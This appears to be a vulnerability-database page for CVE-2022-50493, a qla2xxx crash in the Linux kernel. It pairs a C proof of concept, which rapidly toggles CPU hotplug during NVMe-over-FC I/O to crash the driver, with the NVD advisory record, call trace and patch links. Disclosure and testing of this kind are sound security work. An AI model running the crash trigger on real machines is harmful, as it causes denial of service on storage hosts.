CVE-2022-50493

// CVE-2022-50493 PoC - Trigger qla2xxx crash via CPU hotplug during NVMe-oF I/O // This PoC demonstrates how to trigger the vulnerability by inducing // CPU hotplug while NVMe over FC I/O operations are in flight #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <pthread.h> #include <errno.h> // Function to write to a specific CPU online file to trigger hotplug int trigger_cpu_hotplug(int cpu_num, int online) { char path[64]; snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/online", cpu_num); int fd = open(path, O_WRONLY); if (fd < 0) { perror("open cpu online"); return -1; } const char *state = online ? "1" : "0"; if (write(fd, state, 1) != 1) { perror("write cpu state"); close(fd); return -1; } close(fd); return 0; } // Thread function to perform continuous I/O on NVMe device void* nvme_io_worker(void* arg) { char *dev_path = (char*)arg; int fd = open(dev_path, O_RDWR | O_DIRECT); if (fd < 0) { perror("open nvme device"); return NULL; } char buf[4096] __attribute__((aligned(4096))); memset(buf, 0xAA, sizeof(buf)); // Perform continuous I/O to keep requests in flight while (1) { for (int i = 0; i < 1000; i++) { // Issue read operations to generate I/O load lseek(fd, i * 4096, SEEK_SET); read(fd, buf, sizeof(buf)); } } close(fd); return NULL; } int main(int argc, char *argv[]) { if (argc < 2) { fprintf(stderr, "Usage: %s <nvme_device>\n", argv[0]); fprintf(stderr, "Example: %s /dev/nvme0n1\n", argv[0]); return 1; } printf("[*] CVE-2022-50493 PoC - qla2xxx abort timeout crash\n"); printf("[*] Starting NVMe I/O worker thread...\n"); pthread_t io_thread; if (pthread_create(&io_thread, NULL, nvme_io_worker, argv[1]) != 0) { perror("pthread_create"); return 1; } // Let I/O start sleep(2); printf("[*] Triggering CPU hotplug to induce abort timeout...\n"); // Rapidly toggle CPU states to trigger hotplug events // while I/O requests are in flight for (int round = 0; round < 100; round++) { for (int cpu = 1; cpu < 8; cpu++) { trigger_cpu_hotplug(cpu, 0); // offline usleep(10000); trigger_cpu_hotplug(cpu, 1); // online usleep(10000); } printf("[+] Round %d completed\n", round + 1); } printf("[*] Done. Check dmesg for crash logs.\n"); pthread_cancel(io_thread); pthread_join(io_thread, NULL); return 0; }

{"cve": {"id": "CVE-2022-50493", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:46.300", "lastModified": "2026-01-23T20:44:34.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix crash when I/O abort times out\n\nWhile performing CPU hotplug, a crash with the following stack was seen:\n\nCall Trace:\n qla24xx_process_response_queue+0x42a/0x970 [qla2xxx]\n qla2x00_start_nvme_mq+0x3a2/0x4b0 [qla2xxx]\n qla_nvme_post_cmd+0x166/0x240 [qla2xxx]\n nvme_fc_start_fcp_op.part.0+0x119/0x2e0 [nvme_fc]\n blk_mq_dispatch_rq_list+0x17b/0x610\n __blk_mq_sched_dispatch_requests+0xb0/0x140\n blk_mq_sched_dispatch_requests+0x30/0x60\n __blk_mq_run_hw_queue+0x35/0x90\n __blk_mq_delay_run_hw_queue+0x161/0x180\n blk_execute_rq+0xbe/0x160\n __nvme_submit_sync_cmd+0x16f/0x220 [nvme_core]\n nvmf_connect_admin_queue+0x11a/0x170 [nvme_fabrics]\n nvme_fc_create_association.cold+0x50/0x3dc [nvme_fc]\n nvme_fc_connect_ctrl_work+0x19/0x30 [nvme_fc]\n process_one_work+0x1e8/0x3c0\n\nOn abort timeout, completion was called without checking if the I/O was\nalready completed.\n\nVerify that I/O and abort request are indeed outstanding before attempting\ncompletion."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.17", "versionEndExcluding": "5.4", "matchCriteriaId": "52607F53-FDC9-4FD7-8CD9-7911AF5733F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.4", "versionEndExcluding": "5.15.86", "matchCriteriaId": "FD782530-D591-4DEB-9E5C-4361F5C2FF59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/05382ed9142cf8a8a3fb662224477eecc415778b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/68ad83188d782b2ecef2e41ac245d27e0710fe8e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cb4dff498468b62e8c520568559b3a9007e104d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d3871af13aa03fbbe7fbb812eaf140501229a72e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}